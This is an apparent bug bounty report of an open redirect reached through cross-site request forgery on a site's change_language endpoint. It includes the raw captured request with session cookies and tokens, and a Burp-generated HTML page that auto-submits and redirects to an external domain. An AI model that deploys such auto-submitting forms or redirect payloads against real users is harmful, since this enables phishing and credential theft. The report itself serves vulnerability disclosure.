João VictorReward: 15$
Overview of the Vulnerability
Open redirects occur when an application accepts user input that is not validated into the target of a redirection. This input causes a redirection to an external domain, manipulating a user by redirecting them to a malicious site. An open redirect was identified which can impact users' ability to trust legitimate web pages. An attacker can send a phishing email that contains a link with a legitimate business name in the URL and the user will be redirected from the legitimate web server to any external domain. Users are less likely to notice subsequent redirects to different domains when an authentic URL with a valid SSL certificate can be used within the phishing link.
This type of attack is also a precursor for more serious vulnerabilities such as Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), or successful phishing attempts where an attacker can harvest users' credentials or gain users' OAuth access by relaying them through an Open Redirection, to a server they control (and can see the inbound requests from).
Business Impact
Open redirects can result in reputational damage for the business as customers' trust is negatively impacted by an attacker sending them to a phishing site to extract login credentials, or coercing them to send a financial transaction.
Steps to Reproduce
Copy and paste the request below into the burp suite using the "Generate CSRF Poc" functionality, create an HTML page and access it via browser (with the same burp proxy)
Request
POST /account/change_language HTTP/2
Host: site.com
Cookie: anon-device-id=4c27c635-6a6f-488f-b9a2-9f29173ff515; __cf_bm=Rac7hxpK8o94OYuHBu0gHix5xW0o11y2VhCwxxB_FR4-1707166647-1-AY6CLDec/7yODhPtCT3RC8iWE1Y6m7OqSf1VTqUO7pToGWcrBI9nnOYtOtQ1q4IiaLJ/vu3GKRnCEJyPWMrGaEw=; _mfp_session=kBbELYGofqGXJmZg0zIGaRo5jp7GSfjdTL6s34tbquYJoS4J1VYF1cPZkd6x2Z4xx8R7OKNpX6OJOndQS%2BN4G%2By0pbfitT5oXfov74Cp89zjaFAtX5s7ER0iMSrpbLnlK2jKRHxyusVX2AvU9v5fGc5ApZM4PL3NNdNsmqcxawJcMInSweGvPuOyFMPVYZnsSvkvWS0ARSviiGtwV%2BVM3LlRaG%2F4TgfDEiovbD%2BaszqwpTJntbX9%2Bb%2F3KjwFwitYeifofA8tvKjngXhky36cBVNBDhaToZwxIFnHZp07zLv%2FaHWEKJV4aV11Y3hT%2FGzfJrJjttWtMJicou7FDNX3eXmHhUkJ8zDX22eLGUVTu6w%3D--6me1Z0vPivn%2BoJTV--XkmHgGy679Gl%2FKNsddY7Cw%3D%3D; __Host-next-auth.csrf-token=a139928ae57b8911a5892a7866026aa63815d65196e4e5c6218aaceabb9d4c8d%7C4c4e2344fbf4063da52b2f3ec8315251ff45a9a1bf6e3dfa6018aa87d031a820; __Secure-next-auth.callback-url=https%3A%2F%2Fwww.myfitnesspal.com; AMP_MKTG_2746a27a28=JTdCJTdE; sp_gam_npa=false; dnsDisplayed=undefined; ccpaApplies=true; signedLspa=undefined; _sp_su=false; cf_clearance=xKv4h6PVvCdNz7Ru5gaJgKtAYmWXoaflj0xDqSOggT0-1707166524-1-AWvQd7Iq4gjsZKptQAw3Q+5trsYPEFKOazWRqcbbdG7Z5Wurf9+pCIlWRXfiNiuMG3qUKUj2euDmAeHb2mor0To=; AMP_2746a27a28=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJlNWQwMzQ0My0yZTdmLTQ0YmItOTRlNy0zMjllNDI1NGNjZTAlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzA3MTY2NTIwNjEwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTcwNzE2NjU0NTAxMSUyQyUyMmxhc3RFdmVudElkJTIyJTNBNSU3RA==; ccpaConsentAll=true; ccpaReject=false; consentStatus=consentedAll; ccpaUUID=215fdb39-e2eb-4b5e-9042-6f2987093e4b; consentUUID=05f64a74-d7ed-4569-8d6d-303333bf8b4b; _dd_s=logs=0&expire=1707167476513&rum=2&id=fb0f58b6-9182-4e3e-92d0-04445647a54f&created=1707166516408; language_setting=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
authenticity_token=%2BpU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN%2BdztJQjvJuWkCsTOPQ==&originating_path=http://www.c4ng4c31r0.com%3F&preference[language_setting]=en
CSRF HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://site.com/account/change_language" method="POST">
<input type="hidden" name="authenticity_token" value="+pU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN+dztJQjvJuWkCsTOPQ==" />
<input type="hidden" name="originating_path" value="http://www.c4ng4c31r0.com" />
<input type="hidden" name="preference[language_setting]" value="en" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
PoC:
Generation CSRF PoC
Acessing URL generated with PoC
Redirecting
Reward/Status:
